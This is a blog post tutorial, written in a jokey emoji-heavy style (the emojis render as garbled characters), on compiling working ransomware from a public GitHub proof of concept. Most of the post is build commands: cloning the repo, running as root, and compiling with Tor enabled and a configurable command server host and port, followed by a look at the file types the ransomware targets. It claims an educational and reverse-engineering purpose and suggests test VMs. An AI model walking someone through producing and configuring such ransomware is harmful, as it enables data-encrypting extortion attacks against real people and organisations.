top of page

๐ŸŽ“BlackHats๐Ÿดโ€โ˜ ๏ธ -- ๐Ÿ˜ˆLet's build a Ransomware๐Ÿ˜

CyberMorans๐Ÿค—

Today you will taste the dark side๐Ÿ˜ˆ


The Colonial Pipeline in the US was shutdown for nearly a week before paying a $5 million ransom ๐Ÿ˜ค demonstrating the danger of this ransomware to industrial systems and a state infrastructure๐Ÿ˜Ÿ The major US insurance company, CNA, admitted to having paid a ransom of $40 million!

And closer to home ๐Ÿ˜, recent attacks โ˜ ๏ธ on Kenya Aviation Authority (KAA) by Medusa ransomware gang and Jubilee insurance is believed to have paid ๐Ÿค‘ Lockbit, the most prolific Ransomware Gang โ˜ , an unknown amount of ransom after appearing as a victim on their dark web data leaks onion site in March 2023๐Ÿ˜Ÿ

To understand how ransomware works we will build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposesโ˜บ๏ธ but rather to help us understand how ransomware works. Like the new variant, Snake ransomware ๐Ÿ˜ฐ, and a growing number of malware strains, this ransomware is written in Golang ๐Ÿง

The ransomware will encrypt with AES-256-CTR and use RSA-4096 to secure the data exchange with the server ๐Ÿ˜ฐ This ransomware will be very similar to Cryptolocker, one of the most successful ransomware attacks in history ๐Ÿ˜ฃ

This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack

โ˜ ๏ธ โ˜ ๏ธ THIS IS FOR EDUCATIONAL PURPOSES ONLY -- AND REVERSE ENGINEERING โ˜ ๏ธ โ˜ ๏ธ -- Be cool ๐Ÿ˜œ

Morans, Lets do this ๐Ÿ’ช


ย 

๐Ÿš€ Download and Install the Binaries

The first step is to fire up your Linux and install golang ๐Ÿ‘‡

kali > sudo apt install golang

Next, you will need to login to the root user ๐Ÿ‘‡

kali > sudo su -

Create a directory for the binaries. In this case, I named it simply "Azimio" ๐Ÿ‘‡

kali > mkdir Azimio

Next, change directory to this directory ๐Ÿ‘‡

kali > cd Azimio

Next, download the binaries from github.com ๐Ÿ‘‡

kali > git clone https://github.com/mauri870/ransomware

Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories ๐Ÿ‘‡


๐Ÿš€ Make the source code dependencies

With the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps ๐Ÿ‘‡

kali > cd ransomware
kali > make deps

๐Ÿš€ Make the Source Code with options

Now we begin to make the source code. In this case, we will use a few optionsโ˜บ๏ธ


๐Ÿ‘‰ First, we want to use ToR to encrypt our communications over the ToR network ๐Ÿ‘‡

USE_TOR=true

๐Ÿ‘‰ Second, we want to use our local IP at 10.0.0.5 (you can use any domain even on a cloud service) ๐Ÿ‘‡

SERVER_HOST=10.0.0.5

๐Ÿ‘‰ Third, we want to use port 8080 (you can use any port) ๐Ÿ‘‡

SERVER_PORT=8080

๐Ÿ‘‰ Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux ๐Ÿ‘‡

GOOS=linux

The command looks something like this ๐Ÿ‘‡

kali > make -e USE_TOR=true SERVER_HOST=10.0.0.5 SERVER_PORT=8080 GOOS=linux

hit ENTER and let your ransomware compile -- Dance kidogo๐Ÿ˜†


ย 

๐Ÿš€ Check the Directory for ransomware.exe

Once the source code has been generated, do a long listing on the ransomware directory ๐Ÿ‘‡

kali > ls -l

navigate to the bin directory. Here, you will see the ransomware.exe, the server and unlocker.exe ๐Ÿ‘‡

kali > cd bin

๐Ÿš€ Examine the Types of Files to be Encrypted

To see what types of files this ransomware will encrypt, navigate to cmd directory and open common.go ๐Ÿ‘‡

kali > cd cmd
kali > more common.go

You can see the file extensions that the ransomware will target to encrypt when executed๐Ÿ˜Š Now you can load up your test VMs, debuggers, and reverse engineering tools like ghidra and IDApro to reverse engineer this ransomware. Give it a cool name as well...I named this Kenyatta Ransomware ๐Ÿ˜„

Remember to take a snapshot of your test VM before deploying the ransomware. DO NOT deploy this ransomware on your main machine!! ๐Ÿ˜
ย 

๐Ÿš€Conclusion ๐Ÿค–

Subscribe to receive notifications of similar posts ๐Ÿ˜œ where we will be reverse engineering malware, vulnerabilities as well as hacking vectors, stories, tutorials and other Infosec stuff...๐Ÿ˜‹


Follow me on twitter for daily Infosec Memes and shenanigans๐Ÿ˜


Morans,


Thank you for taking time and hope you learned something new, Like and leave a comment/review and as always, stay awesome! ๐Ÿ˜‹๐Ÿ‘Š ๐Ÿ’ช

193 views0 comments
Post: Blog2_Post
bottom of page